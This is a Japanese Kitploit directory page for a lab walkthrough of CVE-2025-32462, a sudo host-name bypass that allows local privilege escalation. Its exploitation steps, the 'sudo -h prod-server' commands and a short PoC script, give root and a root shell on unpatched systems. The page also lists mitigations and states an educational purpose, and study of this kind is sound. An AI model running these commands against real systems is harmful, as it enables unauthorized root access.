Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32462- — CVE-2025-32462 は sudo におけるローカル権限昇格の脆弱性です。 | Kitploit
ツール/GitHubGitHub/offsecplaybook/cve-2025-32462-
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育ラボと実践
GitHuboffsecplaybook/cve-2025-32462-

CVE-2025-32462-

CVE-2025-32462 は sudo におけるローカル権限昇格の脆弱性です。

リポジトリを見る
7ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-32462 – Sudo ホスト名バイパス権限昇格

CVE Cyber Security Penetration Testing Security Research

目次

  1. 概要
  2. 脆弱性の詳細
  3. 影響
  4. ラボ環境
  5. 影響を受けるバージョンの確認
  6. ユーザーと sudoers の設定
  7. 悪用の手順
  8. 概念実証の概要
  9. Ubuntu が脆弱でない理由
  10. 緩和策
  11. MITRE ATT&CK マッピング
  12. 参考文献
  13. 免責事項

概要

CVE-2025-32462 は、sudo における ローカル権限昇格の脆弱性 であり、低権限ユーザーが ホスト名で制限された sudo ルール を悪用して root としてコマンドを実行できるようにするものです。問題は、sudo が認証チェック時に -h (ホスト) オプションをどのように処理してきたかにあります。

sudoers ルールが特定のホスト名に制限されている場合、sudo はシステムのホスト名がルールと一致する場合にのみ実行を許可するべきです。しかし、ロジックの欠陥により、影響を受けるバージョンでは sudo -h を介して ユーザーが指定したホスト名 を信頼してしまい、攻撃者が制限を完全に回避できるようになります。


脆弱性の詳細

  • CVE ID: CVE-2025-32462
  • 種類: ローカル権限昇格
  • 影響を受けるコンポーネント: sudo
  • 攻撃ベクトル: ローカル
  • 必要な権限: 低 (sudo 以外のユーザー)
  • ユーザーの操作: なし

根本原因

sudo は、-h <hostname> 引数が認証判断に影響を与えることを許可していました。脆弱なバージョンでは、指定されたホスト名がシステムの実際のホスト名に対して厳密に検証される代わりに、sudoers ルールの評価時に信頼されていました。

その結果、ホストベースの sudo 制限をバイパスできる可能性がありました。


影響

悪用に成功した場合、ローカル攻撃者は以下のことが可能になります:

  • 任意のコマンドを root として実行
  • システムを完全に侵害
  • 管理上のセキュリティ境界をバイパス

実際の環境では、この脆弱性は特に以下の場所で危険です:

  • マルチユーザーシステム
  • ホスト固有の sudo ルールを使用する堅牢化環境
  • 踏み台ホストやジャンプホスト

ラボ環境

コンポーネント詳細
OSDebian 11 (Bullseye – 未パッチ)
sudo バージョン≤ 1.9.13
アクセスレベルローカルユーザー
仮想化VirtualBox

⚠️ 注: 最新の Ubuntu および Debian リリースでは、類似したバージョン文字列を保持しながらパッチがバックポートされています。この脆弱性はパッチ適用済みのシステムでは再現できません。


ステップ 1 – 影響を受ける sudo バージョンの確認

root@kitploit:~
sudo --version

期待される出力 (脆弱な場合):

root@kitploit:~
Sudo version 1.9.5p2

ステップ 2 – 低権限ユーザーの作成

root@kitploit:~
sudo useradd -m attacker
sudo passwd attacker
groups attacker

期待される出力:

root@kitploit:~
attacker : attacker

ユーザーは sudo グループに 所属していない 必要があります。


ステップ 3 – 脆弱な sudoers ルールの設定

安全に sudoers を編集:

root@kitploit:~
sudo visudo

次の行を追加:

root@kitploit:~
attacker prod-server = (root) ALL
  • prod-server は偽のホスト名です
  • 実際のシステムホスト名は異なる必要があります

確認:

root@kitploit:~
sudo -l -U attacker

期待される出力:

root@kitploit:~
User attacker may run the following commands on prod-server:
    (root) ALL

ステップ 4 – 通常の sudo が拒否されることを確認

ユーザーを切り替え:

root@kitploit:~
su - attacker

通常通り sudo を試行:

root@kitploit:~
sudo id

期待される出力:

root@kitploit:~
attacker is not allowed to run sudo on <hostname>

ステップ 5 – 悪用 (CVE-2025-32462)

脆弱性をトリガー:

root@kitploit:~
sudo -h prod-server id

悪用成功時の出力:

root@kitploit:~
uid=0(root) gid=0(root) groups=0(root)

ルートシェルを起動:

root@kitploit:~
sudo -h prod-server /bin/bash

確認:

root@kitploit:~
id

概念実証の概要

自動化 PoC スクリプト (オプション)

root@kitploit:~
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id

exploit.sh として保存し、実行可能にして、attacker ユーザーとして実行:

root@kitploit:~
chmod +x exploit.sh
./exploit.sh
アクション結果
通常の sudo❌ 拒否
sudo -h prod-server id✅ Root

これにより、権限昇格が成功したことが確認されます。


Ubuntu が脆弱でない理由

最新の Ubuntu リリースは、影響範囲内の sudo バージョンを搭載しているように見えます。しかし、Ubuntu は CVE‑2025‑32462 のセキュリティ修正をバックポートしており、上流のバージョン文字列は変更されていません。

その結果:

  • sudo -h オプションは認証チェックに影響を与えなくなります
  • ホスト名のなりすましは正しく拒否されます
  • 類似したバージョン番号にもかかわらず、脆弱性は再現できません

これは、バージョン文字列だけではなく、動作テストを使用して脆弱性の状態を検証する重要性を示しています。


緩和策

  • sudo をパッチ適用済みバージョンにアップグレード
  • 可能であればホスト制限付き sudo ルールを削除
  • ローカル権限昇格の試行を監視

MITRE ATT&CK マッピング

  • TA0004 – 権限昇格
  • T1548.003 – 昇格制御メカニズムの悪用 (sudo)

参考文献

  • CVE‑2025‑32462 勧告
  • sudo プロジェクトセキュリティ告知
  • Debian セキュリティトラッカー

免責事項

このウォークスルーは教育および防御的なセキュリティ研究のみを目的としています。この脆弱性を、自分が所有していない、または明示的な許可を得ていないシステムでテストしないでください。

ツールをダウンロード